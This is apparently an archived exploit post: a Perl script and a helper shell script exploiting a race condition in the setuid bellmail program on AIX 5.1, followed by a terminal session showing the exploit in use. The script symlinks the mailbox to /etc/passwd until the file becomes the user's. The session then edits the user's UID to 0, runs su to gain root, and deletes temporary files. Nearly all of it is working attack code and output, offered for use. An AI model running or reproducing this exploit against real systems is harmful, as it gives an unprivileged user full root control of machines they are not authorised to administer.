-bash-2.05b$
-bash-2.05b$ cat x_aix5_bellmail.pl
#!/usr/bin/perl
# FileName: x_aix5_bellmail.pl
# Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail
# command on Aix5 to change any file owner to current user.
#
#Usage : x_aix5_bellmail.pl aim_file
# aim_file : then file wich you want to chown to you.
# Note : Maybe you should run more than one to "Race condition".
# The file named "x_bell.sh" can help you to use this exp.
# You should type "w" "Enter" then "q" "Enter" key on keyboard
# as fast as you can when bellmail prompt "?" appear.
#
# Author : watercloud@xfocus.org
# XFOCUS Team
# http://www.xfocus.net (CN)
# http://www.xfocus.org (EN)
#
# Date : 2004-6-6
# Tested : on Aix5.1.
# Addition: IBM had offered a patch named "IY25661" for it.
# Announce: use as your owner risk!
$CMD="/usr/bin/bellmail";
$MBOX="$ENV{HOME}/mbox";
$TMPFILE="/tmp/.xbellm.tmp";
$AIM_FILE = shift @ARGV ;
$FORK_NUM = 1000;
die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;
unlink $MBOX;
system "echo abc > $TMPFILE";
system "$CMD $ENV{LOGIN} < $TMPFILE";
unlink $TMPFILE;
$ret=`ls -l $AIM_FILE"`;
print "Before: $ret";
if( fork()==0 )
{
&deamon($FORK_NUM);
exit 0 ;
}
sleep( (rand()*100)%4);
exec $CMD;
$ret=`ls -l $AIM_FILE"`;
print "Now: $ret";
sub deamon {
$num = shift || 1;
for($i=0;$i<$num;$i++) {
&do_real() if fork()==0;
}
}
sub do_real {
if(-e $MBOX) {
unlink $MBOX ;
symlink "$AIM_FILE",$MBOX;
}
exit 0;
}
#EOF
-bash-2.05b$
-bash-2.05b$ cat x_bellmail.sh
#!/bin/sh
#File:x_bellmail.sh
#The assistant of x_aix5_bellmail.pl
#Author : watercloud@xfocus.org
#Date :2004-6-6
#
X_BELL_PL="./x_aix5_bellmail.pl"
AIM=$1
if [ $# ne 1 ] ;then
echo "Need a aim file name as argv."
exit 1;
fi
if [ ! -e "$1" ];then
echo "$1 not exist!"
exit 1
fi
if [ ! -x "$X_BELL_PL" ];then
echo "can not exec $X_BELL_PL"
exit 1
fi
ret=`ls -l $AIM`
echo $ret; echo
fuser=`echo $ret |awk '{print $3}'`
while [ "$fuser" != "$LOGIN" ]
do
$X_BELL_PL $AIM
ret=`ls -l $AIM`
echo $ret;echo
fuser=`echo $ret |awk '{print $3}'`
done
echo $ret; echo
#EOF
-bash-2.05b$ id
uid=201(cloud) gid=1(staff)
-bash-2.05b$
-bash-2.05b$ oslevel
5.1.0.0
-bash-2.05b$ oslevel -r
5100-01
-bash-2.05b$ ls -l /usr/bin/bellmail
-r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cp /etc/passwd /tmp/
-bash-2.05b$ ./x_bellmail.sh /etc/passwd
./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:30 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:35 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:40 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:43 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
w
From cloud Sun Jun 6 08:49:48 2004
abc
? From cloud Sun Jun 6 08:25:20 2004
abc
? w
bellmail: cannot append to /home/cloud/mbox
? w
bellmail: cannot append to /home/cloud/mbox
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:56 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:50:01 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd
-bash-2.05b$ su cloud
cloud's Password:
3004-502 Cannot get "LOGNAME" variable.
-bash-2.05b$ id
uid=201 gid=1(staff)
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd
-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:0:1::/home/cloud:/usr/local/bin/bash
test:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ su cloud
cloud's Password:
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b# ls -l /etc/passwd
-rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd
bash-2.05b# cp /tmp/passwd /etc/passwd
bash-2.05b# chown root /tmp/passwd
bash-2.05b# ls -l /tmp/passwd
-rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#
# milw0rm.com [2005-05-19]